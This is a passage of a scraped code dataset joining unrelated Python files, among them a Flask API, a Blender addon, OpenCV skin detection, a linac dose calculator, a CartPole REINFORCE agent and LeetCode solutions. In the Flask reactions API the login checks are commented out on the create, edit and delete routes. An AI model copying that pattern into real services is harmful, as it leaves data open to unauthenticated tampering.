\"total_events\"]].head(20))","repo_name":"LakshyaDaBestCoder/ArticleRecommendation_Unfinal","sub_path":"demographic_filtering.py","file_name":"demographic_filtering.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11364686390","text":"from flask import Blueprint, jsonify, session, request\nfrom app.models import User, db, Reaction\nfrom flask_login import current_user, login_required\n\nreaction_routes = Blueprint('reactions', __name__)\n\n\n# Get All Reaction\n@reaction_routes.route('/', methods=['GET'])\ndef getAllReactions():\n reactions = Reaction.query.all()\n\n reactions_info = []\n\n for each in reactions:\n reactions_info.append({\n 'id': each.id,\n 'content': each.content,\n 'user_id': each.user_id,\n 'message_id': each.message_id\n })\n\n return {'reactions': reactions_info}\n\n\n# Get Details of a Reaction from an Id\n@reaction_routes.route('/<int:id>', methods=['GET'])\ndef reactionDetails(id):\n reaction_Details = Reaction.query.get(id)\n if reaction_Details is None:\n return {'errors': [\"Reaction couldn't be found\"]}, 404\n\n ret = {\n 'id': reaction_Details.id,\n 'content': reaction_Details.content,\n 'user_id': reaction_Details.user_id,\n 'message_id': reaction_Details.message_id\n }\n\n return ret\n\n\n#using websocket instead\n# Create a New Reaction\n@reaction_routes.route('/<int:id>/new', methods=['POST'])\n# @login_required\ndef createReaction(id):\n current_user_id = current_user.get_id()\n new_content = request.json['content']\n\n new = Reaction(\n content=new_content,\n user_id=current_user_id,\n message_id=id\n )\n db.session.add(new)\n db.session.commit()\n return new.to_dict()\n\n\n\n# Edit a Reaction\n@reaction_routes.route('/<int:id>', methods=['PUT'])\n# @login_required\ndef editReaction(id):\n\n reaction_edit = Reaction.query.get(id)\n\n #error response:\n if reaction_edit is None:\n return {'message': [\"Reaction couldn\\'t be found\"]}, 404\n new_content = request.json['content']\n reaction_edit.content=new_content\n\n db.session.commit()\n return reaction_edit.to_dict()\n\n\n# Delete a Reaction\n@reaction_routes.route('/<int:id>', methods=[\"DELETE\"])\n# @login_required\ndef deleteReaction(id):\n reaction_Delete = Reaction.query.get(id)\n if reaction_Delete is None:\n return {'errors': [\"Reaction couldn't be found\"]}, 404\n db.session.delete(reaction_Delete)\n db.session.commit()\n return {'message': \"Successfully deleted\"}, 200\n","repo_name":"matt7xu/gamerCord","sub_path":"app/api/reaction_routes.py","file_name":"reaction_routes.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21145281599","text":"import bpy\r\nimport math\r\n\r\nfrom bpy.types import Menu\r\n\r\nclass SCREEN_pie(Menu):\r\n # label is displayed at the center of the pie menu.\r\n bl_label = \"Screen UI Layout\"\r\n \r\n def draw(self, context):\r\n layout = self.layout\r\n\r\n pie = layout.menu_pie()\r\n idx=bpy.data.window_managers['WinMan'].screen_pie_index\r\n # operator_enum will just spread all available options\r\n # for the type enum of the operator on the pie\r\n if len(bpy.data.screens)>8:\r\n tot=math.ceil((len(bpy.data.screens)-7)/6)\r\n if idx==0:\r\n op=pie.operator(\"screen_pie.change\", text=bpy.data.screens[0].name)\r\n op.name=bpy.data.screens[0].name\r\n pie.operator(\"screen_pie.next_caller\", text='', icon='FORWARD')\r\n for n in range(1, 7):\r\n op=pie.operator(\"screen_pie.change\", text=bpy.data.screens[n].name)\r\n op.name=bpy.data.screens[n].name\r\n else:\r\n if idx!=tot:\r\n min=6*idx\r\n max=min+6\r\n pie.operator(\"screen_pie.previous_caller\", text='', icon='BACK')\r\n pie.operator(\"screen_pie.next_caller\", text='', icon='FORWARD')\r\n elif idx==tot:\r\n min=7*idx\r\n max=min+7\r\n pie.operator(\"screen_pie.previous_caller\", text='', icon='BACK')\r\n for n in range(min, max):\r\n try:\r\n op=pie.operator(\"screen_pie.change\", text=bpy.data.screens[n].name)\r\n op.name=bpy.data.screens[n].name\r\n except IndexError:\r\n pass\r\n else:\r\n for screen in bpy.data.screens:\r\n op=pie.operator(\"screen_pie.change\", text=screen.name)\r\n op.name=screen.name\r\n \r\nclass SCREEN_PIE_caller(bpy.types.Operator):\r\n bl_idname = \"screen_pie.caller\"\r\n bl_label = \"Screen UI Pie Menu\"\r\n bl_description = \"\"\r\n bl_options = {\"REGISTER\"}\r\n\r\n \r\n\r\n def execute(self, context):\r\n bpy.data.window_managers['WinMan'].screen_pie_index=0\r\n bpy.ops.wm.call_menu_pie(name=\"SCREEN_pie\")\r\n return {\"FINISHED\"}\r\n \r\nclass SCREEN_PIE_next_caller(bpy.types.Operator):\r\n bl_idname = \"screen_pie.next_caller\"\r\n bl_label = \"\"\r\n bl_description = \"Go to next Screen UI Pie menu\"\r\n bl_options = {\"REGISTER\"}\r\n\r\n @classmethod\r\n def poll(cls, context):\r\n idx=bpy.data.window_managers['WinMan'].screen_pie_index\r\n tot=math.ceil((len(bpy.data.screens)-7)/6)\r\n return idx>=0 and idx<=tot\r\n\r\n def execute(self, context):\r\n bpy.data.window_managers['WinMan'].screen_pie_index+=1\r\n bpy.ops.wm.call_menu_pie(name=\"SCREEN_pie\")\r\n return {\"FINISHED\"}\r\n \r\nclass SCREEN_PIE_previous_caller(bpy.types.Operator):\r\n bl_idname = \"screen_pie.previous_caller\"\r\n bl_label = \"\"\r\n bl_description = \"Go to previous Screen UI Pie menu\"\r\n bl_options = {\"REGISTER\"}\r\n\r\n @classmethod\r\n def poll(cls, context):\r\n idx=bpy.data.window_managers['WinMan'].screen_pie_index\r\n return idx>0 \r\n\r\n def execute(self, context):\r\n bpy.data.window_managers['WinMan'].screen_pie_index-=1\r\n bpy.ops.wm.call_menu_pie(name=\"SCREEN_pie\")\r\n return {\"FINISHED\"}","repo_name":"samytichadou/Screen-Pie-Blender-Addon","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"17586979274","text":"# -*- coding:utf-8 -*-\nimport cv2\nimport numpy as np\n\n\ndef ellipse_detect(image):\n \"\"\"YCrCb颜色空间的椭圆肤色分割\"\"\"\n # image = cv2.imread(image, cv2.IMREAD_COLOR)\n skinCrCbHist = np.zeros((256, 256), dtype=np.uint8)\n cv2.ellipse(skinCrCbHist, (113, 155), (23, 15),\n 43, 0, 360, (255, 255, 255), -1)\n YCRCB = cv2.cvtColor(image, cv2.COLOR_BGR2YCR_CB)\n (y, cr, cb) = cv2.split(YCRCB)\n mask = np.zeros(cr.shape, dtype=np.uint8)\n (x, y) = cr.shape\n for i in range(0, x):\n for j in range(0, y):\n CR = YCRCB[i, j, 1]\n CB = YCRCB[i, j, 2]\n if skinCrCbHist[CR, CB] > 0:\n mask[i, j] = 255\n return mask\n\n\ndef cr_otsu(image):\n \"\"\"YCrCb颜色空间的Cr分量+Otsu阈值分割\"\"\"\n ycrcb = cv2.cvtColor(image, cv2.COLOR_BGR2YCR_CB)\n (y, cr, cb) = cv2.split(ycrcb)\n cr = cv2.GaussianBlur(cr, (5, 5), 0)\n cv2.imshow(\"cr\", cr)\n gry = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n cr1 = cv2.GaussianBlur(gry, (5, 5), 0)\n _, mask = cv2.threshold(cr1, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n return mask\n\n\ndef crcb_range_sceening(image):\n \"\"\"YCrCb颜色空间的CrCb分量阈值分割\"\"\"\n ycrcb = cv2.cvtColor(image, cv2.COLOR_BGR2YCR_CB)\n (y, cr, cb) = cv2.split(ycrcb)\n mask = np.zeros(cr.shape, dtype=np.uint8)\n (x, y) = cr.shape\n for i in range(0, x):\n for j in range(0, y):\n if (cr[i][j] > 140) and (cr[i][j]) < 175 and (cb[i][j] > 100) and (cb[i][j]) < 120:\n mask[i][j] = 255\n else:\n mask[i][j] = 0\n return mask\n\n\ndef hsv_detect(image):\n \"\"\"HSV颜色空间的阈值分割\"\"\"\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n (_h, _s, _v) = cv2.split(hsv)\n mask = np.zeros(_h.shape, dtype=np.uint8)\n (x, y) = _h.shape\n for i in range(0, x):\n for j in range(0, y):\n if (_h[i][j] > 7) and (_h[i][j] < 20) and (_s[i][j] > 28) and (_s[i][j] < 255) and (_v[i][j] > 50) and (\n _v[i][j] < 255):\n mask[i][j] = 255\n else:\n mask[i][j] = 0\n\n return mask\n\n\nimg = cv2.imread('567.jpg')\n# 圖片前處理\nimage = cv2.resize(img, (256, 256), interpolation=cv2.INTER_CUBIC)\n\nif __name__ == \"__main__\":\n \n # cv2.imshow(\"1\", ellipse_detect(image))\n cv2.imshow(\"2\", cr_otsu(image))\n # cv2.imshow(\"3\", crcb_range_sceening(image))\n # cv2.imshow(\"4\", hsv_detect(image))\n cv2.waitKey(0)\n","repo_name":"sklonely/python","sub_path":"腳辨識/skin_detector.py","file_name":"skin_detector.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"73006784805","text":"# -*- coding: utf-8 -*-\n# Author: Francois Tadel\n# License GNU GPL v3\n\nimport sys, os, json\nfrom collections import OrderedDict\n\nfrom locateElectrodes import LocateElectrodes\nfrom brainvisa import axon\nfrom soma.qt_gui.qt_backend import QtGui, QtCore, uic\n\n\ndef main(inFile, outFolder):\n \n # Read input file\n f = open(inFile, 'r')\n lines = f.readlines()\n f.close()\n # Create dictionnary\n plot_dict_MNI = OrderedDict()\n for iLine in range(len(lines)):\n # Skip header line\n if (iLine == 0):\n continue\n # Get contact name and positions\n contactInfo = lines[iLine].split()\n # Separate electrode name / contact index (find last letter)\n origName = list(contactInfo[0])\n iLastLetter = None\n for i in reversed(list(range(len(origName)))):\n if not origName[i].isdigit():\n iLastLetter = i\n break\n if iLastLetter is None:\n continue\n # Upper case for all the letters except from \"p\" that stand for ' (prime)\n for i in range(iLastLetter+1):\n if (i == 0) or (origName[i] != 'p'):\n origName[i] = origName[i].upper()\n elif (i > 0) and (origName[i] == 'p'):\n origName[i] = \"'\"\n # Format CSV contact name\n cleanName = ''.join(origName[:iLastLetter+1]) + \"%02d\" % int(''.join(origName[iLastLetter+1:]))\n # Add contact to the list\n plot_dict_MNI[cleanName] = [float(contactInfo[1]), float(contactInfo[2]), float(contactInfo[3])]\n\n # Sort contact names\n plot_dict_MNI = OrderedDict(sorted(plot_dict_MNI.items()))\n \n # Get input base name\n fPath, fName = os.path.split(inFile)\n baseName, fExt = os.path.splitext(fName)\n # Create output filenames\n fileEleclabel = os.path.join(outFolder, baseName + \".eleclabel\")\n fileCsv = os.path.join(outFolder, baseName + \".csv\") \n \n # Start BrainVISA\n app = QtGui.QApplication(sys.argv)\n axon.initializeProcesses()\n w = LocateElectrodes()\n\n # Call export functions from locateElectrodes\n w.exportParcels2(True, True, plot_dict_MNI, None, fileEleclabel)\n w.exportCSVdictionaries(False, fileEleclabel, None, fileCsv, plot_dict_MNI)\n\n\n# Calling from command line\nif __name__ == \"__main__\":\n # Test input parameters\n if (len(sys.argv) < 3) or not os.path.exists(sys.argv[1]) or not os.path.exists(sys.argv[2]):\n print(\"USAGE: convert_mni2mcs.py input_mni.txt output_dir\")\n sys.exit(2)\n main(sys.argv[1], sys.argv[2])\n \n ","repo_name":"IntrAnatSEEGSoftware/IntrAnat","sub_path":"convert_mni2csv_old.py","file_name":"convert_mni2csv_old.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"52"} +{"seq_id":"18527618474","text":"from os import system\nimport platform\n\n\n#clean consule function\ndef clean ():\n clean = platform.system().lower()\n if 'windows' in clean:\n system('cls')\n else:\n system('clear')\n\ndef v1andMU (MU, v1):\n v1andMU = v1/MU\n return v1andMU\n\ndef KTP (p, T):\n KTP = ((273.2+T)*p0)/((273.2+T0)*p)\n return KTP\n\ndef Kpol (M1, M2):\n Kpol = ((M1)+(M2))/(2*M1)\n return Kpol\n\ndef Ks (v1, v2):\n Ks = 1.198+(-0.8753)*(v1/v2)+0.6773*(v1/v2)**2\n return Ks\n\ndef Dzref (M1, ndw, kQ):\n Dzref = M1*Kpol(M1, M2)*Ks(v1,v2)*KTP(p,T)*ndw*kQ\n return Dzref\ndef Dzmax (PDD):\n Dzmax =( 100 * (Dzref (M1, ndw, kQ)/PDD))*100\n return Dzmax\n\ndef main():\n hasilRatio = v1andMU(MU, v1)\n print(f\"Ratio of dosimeter reading and monitor unit: {hasilRatio} nC/MU\")\n hasilKTP = KTP (p, T)\n print(f\"Temperature and presure correction: {hasilKTP}\")\n hasilKpol = Kpol (M1, M2)\n print(f\"Polarization correction: {hasilKpol}\")\n hasilKs = Ks (v1, v2)\n print(f\"Saturation correction: {hasilKs}\")\n hasilDzref = Dzref (M1, ndw, kQ)\n print(f\"Dose at Z ref: {hasilDzref} Gy/MU\")\n hasilDzmax = Dzmax (PDD)\n print(f\"Dose at Z Max: {hasilDzmax} cGy/MU\")\n\n#variabel needed\nMU = None; p=None; T=None; T0=20; p0=101.3; M1= None; M2=None;\nv1=None; v2=None; ndw=None; kQ=None; PDD=None\n\n# MU\nwhile MU is None:\n value = input('MU value: ')\n try:\n MU = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n print(20*'=')\n continue\n# v1\nwhile v1 is None:\n value = input('v1 value: ')\n try:\n v1 = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n continue\n# v2\nwhile v2 is None:\n value = input('v2 value: ')\n try:\n v2 = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n continue\n# M1\nwhile M1 is None:\n value = input('M1 value: ')\n try:\n M1 = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n continue\n# M2\nwhile M2 is None:\n value = input('M2 value: ')\n try:\n M2 = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n continue\n# p\nwhile p is None:\n value = input('p value: ')\n try:\n p = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n continue\n# T\nwhile T is None:\n value = input('T value: ')\n try:\n T = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n continue\n# PDD\nwhile PDD is None:\n value = input('PDD value: ')\n try:\n PDD = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n continue\n# KQ\nwhile kQ is None:\n value = input('kQ value: ')\n try:\n kQ = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n continue\n# ndw\nwhile ndw is None:\n value = input('ndw value: ')\n try:\n ndw = float(value)\n except ValueError:\n print(f\"{value} is not a number\")\n continue\n \n# Main program loop\nwhile True:\n clean()\n main()\n while True:\n answer = str(input('\\nLagi? (y/n): '))\n if answer in ('y', 'n'):\n break\n print(\"Cek Kembali Input\")\n if answer == 'y':\n clean()\n continue\n else:\n print(\"Dadah\")\n break\n\n\n\n","repo_name":"Stheven-Chen/Linac-High-Energy-Photon","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70520672165","text":"import gym\ngym.logger.set_level(40) # suppress warnings (please remove if gives error)\nimport numpy as np\nfrom collections import deque\nimport matplotlib.pyplot as plt\n\n\nimport torch\ntorch.manual_seed(0) # set random seed\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.distributions import Categorical\n\nimport Policy\nfrom Policy import Policy\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\npolicy = Policy().to(device)\noptimizer = optim.Adam(policy.parameters(), lr=1e-2)\n\ndef main(env, n_episodes=1000, max_t=1000, gamma=1.0, print_every=100):\n\n scores_deque = deque(maxlen=100)\n scores = []\n for i_episode in range(1, n_episodes+1):\n saved_log_probs = []\n rewards = []\n state = env.reset()\n for t in range(max_t):\n action, log_prob = policy.act(state)\n saved_log_probs.append(log_prob)\n state, reward, done, _ = env.step(action)\n rewards.append(reward)\n if done:\n break\n scores_deque.append(sum(rewards))\n scores.append(sum(rewards))\n\n discounts = [gamma**i for i in range(len(rewards)+1)]\n R = sum([a*b for a,b in zip(discounts, rewards)])\n\n policy_loss = []\n for log_prob in saved_log_probs:\n policy_loss.append(-log_prob * R)\n policy_loss = torch.cat(policy_loss).sum()\n\n optimizer.zero_grad()\n policy_loss.backward()\n optimizer.step()\n\n\n if i_episode % print_every == 0:\n print('Episode {}\\tAverage Score: {:.2f} \\tCheckpoint Saved!'.format(i_episode, np.mean(scores_deque)))\n torch.save(policy.state_dict(), 'checkpoint.pth')\n if np.mean(scores_deque)>=195.0:\n print('Environment solved in {:d} episodes!\\tAverage Score: {:.2f} \\tCheckpoint Saved!'.format(i_episode-100, np.mean(scores_deque)))\n torch.save(policy.state_dict(), 'checkpoint.pth')\n break\n\n return scores\n\nif __name__ == \"__main__\":\n env = gym.make('CartPole-v0')\n env.seed(0)\n print('observation space:', env.observation_space)\n print('action space:', env.action_space)\n scores = main(env)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n plt.plot(np.arange(1, len(scores)+1), scores)\n plt.ylabel('Score')\n plt.xlabel('Episode #')\n plt.show()\n","repo_name":"jiruifu-jerry0219/DRLND_Jerry","sub_path":"Reinforce/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73543125284","text":"import numpy as np\nimport pandas as pd\nimport pickle\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom src.utils import expected_profit\n\n\nclass FraudModel():\n\n def __init__(self, cb):\n self.cost_benefit_matrix = cb\n\n def fit(self, X, y):\n # create and fit model\n self.clf_ = GradientBoostingClassifier(learning_rate=.1,\n n_estimators=700,\n max_depth=5,\n random_state=313)\n self.clf_.fit(X, y)\n return self\n\n def predict_profit(self, X_test, y_test):\n preds = self.clf_.predict(X_test)\n cm = confusion_matrix(y_test, preds).ravel()\n return expected_profit(self.cost_benefit_matrix, cm)\n\n def to_pickle(self):\n pickle.dump(self, open(\"static/model.pkl\", \"wb\"))\n\nif __name__ == '__main__':\n # CLI test series\n\n # load pickled DF\n fm = pd.read_pickle('static/fm.pkl')\n\n # split X and y\n y = fm.fraud.values\n X = fm.drop(['fraud'], axis=1).values\n\n # define cost-benefit for test\n cb = np.array([[2190, -10],\n [-2200, -.25]])\n\n # fit and pickle the model\n model = FraudModel(cb).fit(X, y)\n model.to_pickle()\n\n test_model = pickle.load(open('static/model.pkl', 'rb'))\n\n print(test_model)\n","repo_name":"fyrk/case-study-fraud-prediction","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72287018406","text":"# -*- coding: utf-8 -*-\n\"\"\"\nUnit tests for the tf2_msgs strategies.\n\"\"\"\n\nfrom hypothesis import given\nfrom hypothesis.strategies import just\n\nfrom hypothesis_ros.messages.tf2_msgs import tfmessage\nfrom hypothesis_ros.messages.geometry_msgs import (\n transform,\n transform_stamped,\n vector3,\n quaternion\n)\nfrom hypothesis_ros.messages.std_msgs import header\nfrom hypothesis_ros.message_fields import (\n array,\n float64,\n uint32,\n time,\n)\n\n\n@given(array(elements=transform_stamped(\n header(seq=uint32(min_value=0, max_value=0),\n stamp=time(\n secs=uint32(min_value=1, max_value=1),\n nsecs=uint32(min_value=2, max_value=2)\n ),\n frame_id=just('some_tf_frame_name')\n ),\n just('some_child_frame_id'),\n transform(\n translation=vector3(\n x=float64(min_value=1.0, max_value=1.0),\n y=float64(min_value=2.0, max_value=2.0),\n z=float64(min_value=3.0, max_value=3.0)\n ),\n rotation=quaternion(\n x=float64(min_value=1.0, max_value=1.0),\n y=float64(min_value=2.0, max_value=2.0),\n z=float64(min_value=3.0, max_value=3.0),\n w=float64(min_value=4.0, max_value=4.0)\n )\n )\n ), min_size=2, max_size=2\n )\n)\ndef test_tfmessage_accepts_customized_strategies(generated_value):\n \"\"\"Exemplary customized TFMessage.\"\"\"\n assert generated_value == [((0, (1, 2), 'some_tf_frame_name'),\n 'some_child_frame_id',\n ((1.0, 2.0, 3.0), (1.0, 2.0, 3.0, 4.0))),\n ((0, (1, 2), 'some_tf_frame_name'),\n 'some_child_frame_id',\n ((1.0, 2.0, 3.0), (1.0, 2.0, 3.0, 4.0)))]\n","repo_name":"fkromer/hypothesis-ros","sub_path":"tests/messages/test_tf2_msgs.py","file_name":"test_tf2_msgs.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"52"} +{"seq_id":"42392518197","text":"# -*- coding: utf-8 -*-\n'''\nNord VPN API (unofficial)\n=========================\nUnofficial nordvpn api\n'''\n\nVERSION = \"0.0.1\"\n\nfrom setuptools import setup, find_packages\n\nsetup(\n name='nordvpn',\n description='Unofficial nordvpn api',\n long_description='\\n'.join(\n [\n open('README.md', 'rb').read().decode('utf-8')\n ]\n ),\n author='Sang Han',\n license='Apache License 2.0',\n url='https://github.com/jjangsangy/nordvpn',\n author_email='jjangsangy@gmail.com',\n include_package_data=True,\n packages=find_packages(),\n version=VERSION,\n install_requires=['requests', 'chardet', 'pandas'],\n platforms='any',\n zip_safe=True,\n entry_points={\n 'console_scripts': [\n 'nord = nordvpn.__main__:main'\n ]\n },\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'Natural Language :: English',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Unix Shell',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Utilities',\n ],\n)\n","repo_name":"jjangsangy/nordvpn","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"24356514914","text":"\"\"\"\nVincente Pericoli\nUC Davis\n\nfor more info, including license information,\nsee: https://github.com/ucdavis-kanvinde-group/abaqus-odb-tools\n\n\nSet of functions to use with ABAQUS output databases (ODB files).\n\nThese functions rely on the abaqus-odb-tools library (see above).\nThey exist purely for backward-compatibility, since that library\nwas totally refactored into an object-oriented code.\n\nSimply download abaqus-odb-tools, and change the sys.path.append\ndirectory (below) to point towards the download.\n\"\"\"\n\n#\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Import Modules\n\n\nfrom odbAccess import *\nfrom abaqusConstants import *\nimport numpy\nimport sys\nsys.path.append(\"C:\\\\Users\\\\Vince Pericoli\\\\Documents\\\\GitHub\\\\abaqus-odb-tools\")\nfrom odbFieldVariableClasses import *\n\n#\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Function defs\n\ndef getNodalPEEQ(odbName, nodeSetName, verbose=True):\n \"\"\" Returns a CSV of the nodal averaged PEEQ \"\"\"\n \n dataName = 'PEEQ'\n nodalPEEQ = IntPtVariable(odbName, dataName, nodeSetName)\n nodalPEEQ.fetchNodalAverage()\n nodalPEEQ.saveCSV(verbose=verbose)\n return\n\ndef getNodalMises(odbName, nodeSetName, verbose=True):\n \"\"\" returns a CSV of the nodal averaged Mises \"\"\"\n \n dataName = 'MISES'\n nodalMISES = IntPtVariable(odbName, dataName, nodeSetName)\n nodalMISES.fetchNodalAverage()\n nodalMISES.saveCSV(verbose=verbose)\n return\n\ndef getNodalPressure(odbName, nodeSetName, verbose=True):\n \"\"\" returns a CSV of the nodal averaged pressure \"\"\"\n \n dataName = 'PRESS'\n nodalPRESS = IntPtVariable(odbName, dataName, nodeSetName)\n nodalPRESS.fetchNodalAverage()\n nodalPRESS.saveCSV(verbose=verbose)\n return\n \ndef getNodalInv3(odbName, nodeSetName, verbose=True):\n \"\"\" returns a CSV of the nodal averaged third invariant \"\"\"\n \n dataName = 'INV3'\n nodalINV3 = IntPtVariable(odbName, dataName, nodeSetName)\n nodalINV3.fetchNodalAverage()\n nodalINV3.saveCSV(verbose=verbose)\n return\n\ndef getNodalDispl(odbName, nodeSetName, verbose=True):\n \"\"\"\n returns several CSVs of the nodal coordinates\n (one CSV file per direction)\n \"\"\"\n dataName = 'U'\n nodalDispl = NodalVariable(odbName, dataName, nodeSetName)\n nodalDispl.fetchNodalOutput()\n nodalDispl.saveCSV(verbose=verbose)\n return\n\ndef getNodalReactionSum(odbName, nodeSetName, verbose=True):\n \"\"\"\n returns several CSVs of the summed nodal reactions\n (one CSV file per direction)\n \"\"\"\n dataName = 'RF'\n summedRF = NodalVariable(odbName, dataName, nodeSetName)\n summedRF.fetchNodalOutput()\n summedRF.sumNodalOutput()\n summedRF.saveCSV(verbose=verbose)\n return","repo_name":"ucdavis-kanvinde-group/abaqus-pso-calibration","sub_path":"Calibration/odbFetchFieldOutput.py","file_name":"odbFetchFieldOutput.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"73556372964","text":"\"\"\"\nGiven a linked list, swap every two adjacent nodes and return its head.\n\nExample 1:\n\nInput: head = [1,2,3,4]\nOutput: [2,1,4,3]\nExample 2:\n\nInput: head = []\nOutput: []\nExample 3:\n\nInput: head = [1]\nOutput: [1]\n \nConstraints:\n\n The number of nodes in the list is in the range [0, 100].\n 0 <= Node.val <= 100\n \nFollow up: Can you solve the problem without modifying the values in the list's nodes? (i.e., Only nodes themselves may be changed.)\n\"\"\"\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def swapPairs(self, head: ListNode) -> ListNode:\n\n p = head\n while p:\n val = p.val\n\n if p.next:\n p.val = p.next.val\n p.next.val = val\n p = p.next\n\n p = p.next\n\n return head\n\n\nclass Solution:\n def swapPairs(self, head: ListNode) -> ListNode:\n \n def recur(head): \n if not head or not head.next: \n return head \n\n\n p1 = head \n p2 = head.next \n \n p1.next = recur(p2.next)\n p2.next = p1 \n\n return p2 \n \n return recur(head)","repo_name":"chl218/leetcode","sub_path":"python/recurstion-i/swap_nodes_in_pairs.py","file_name":"swap_nodes_in_pairs.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70212618725","text":"import sys\r\nfrom collections import Counter\r\n\r\n\r\ndef main():\r\n N = int(input())\r\n survey = [int(input()) for _ in range(N)]\r\n survey = Counter(survey)\r\n if survey[0] > survey[1]:\r\n print('Junhee is not cute!')\r\n else:\r\n print('Junhee is cute!')\r\n\r\n\r\nif __name__ == '__main__':\r\n input = sys.stdin.readline\r\n main()\r\n","repo_name":"SeungWoo-You/PS","sub_path":"백준/Bronze/10886. 0 = not cute / 1 = cute/0 = not cute / 1 = cute.py","file_name":"0 = not cute / 1 = cute.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6784622448","text":"import sys\n\nfrom PyQt6.QtWidgets import QDialog, QDialogButtonBox, QLabel, QGridLayout, QComboBox, QSpinBox\n\nfrom PyQt6 import QtGui\n\n\nclass MultiGameDialogBox(QDialog):\n\n def __init__(self):\n\n super().__init__()\n\n self.player_a_agent = 1\n self.player_b_agent = 1\n self.player_a_simul_agent = 1\n self.player_b_simul_agent = 1\n self.number_of_games = 1\n\n self.setWindowTitle(\"Run Multiple Games\")\n\n QBtn = QDialogButtonBox.StandardButton.Ok | QDialogButtonBox.StandardButton.Cancel\n\n self.buttonBox = QDialogButtonBox(QBtn)\n self.buttonBox.accepted.connect(self.accept)\n self.buttonBox.rejected.connect(self.reject)\n\n layout = QGridLayout()\n\n self.player_a_dropdown = QComboBox(self)\n self.player_a_dropdown.addItems(['Random', 'Max', 'Minimax'])\n self.player_a_dropdown.activated.\\\n connect(lambda index=self.player_a_dropdown.currentIndex(): self.set_player_a_agent(index))\n\n self.player_b_dropdown = QComboBox(self)\n self.player_b_dropdown.addItems(['Random', 'Max', 'Minimax'])\n self.player_b_dropdown.activated.\\\n connect(lambda index=self.player_b_dropdown.currentIndex(): self.set_player_b_agent(index))\n\n self.player_a_simul_dropdown = QComboBox(self)\n self.player_a_simul_dropdown.addItems(['Random', 'R Learning', 'Q Learning', 'Preset'])\n self.player_a_simul_dropdown.activated. \\\n connect(lambda index=self.player_a_simul_dropdown.currentIndex(): self.set_player_a_simul_agent(index))\n\n self.player_b_simul_dropdown = QComboBox(self)\n self.player_b_simul_dropdown.addItems(['Random', 'R Learning', 'Q Learning', 'Preset'])\n self.player_b_simul_dropdown.activated. \\\n connect(lambda index=self.player_b_simul_dropdown.currentIndex(): self.set_player_b_simul_agent(index))\n\n self.game_count_spin_box = QSpinBox()\n self.game_count_spin_box.setMinimum(1)\n self.game_count_spin_box.setMaximum(9999)\n self.game_count_spin_box.setSuffix(\" rounds\")\n self.game_count_spin_box.setSingleStep(1)\n self.game_count_spin_box.valueChanged.connect(self.no_games_changed)\n\n layout.addWidget(QLabel(\"Set player A agent: \"), 0, 0)\n layout.addWidget(QLabel(\"Set player B agent: \"), 1, 0)\n layout.addWidget(QLabel(\"Set player A simul agent: \"), 2, 0)\n layout.addWidget(QLabel(\"Set player B simul agent: \"), 3, 0)\n 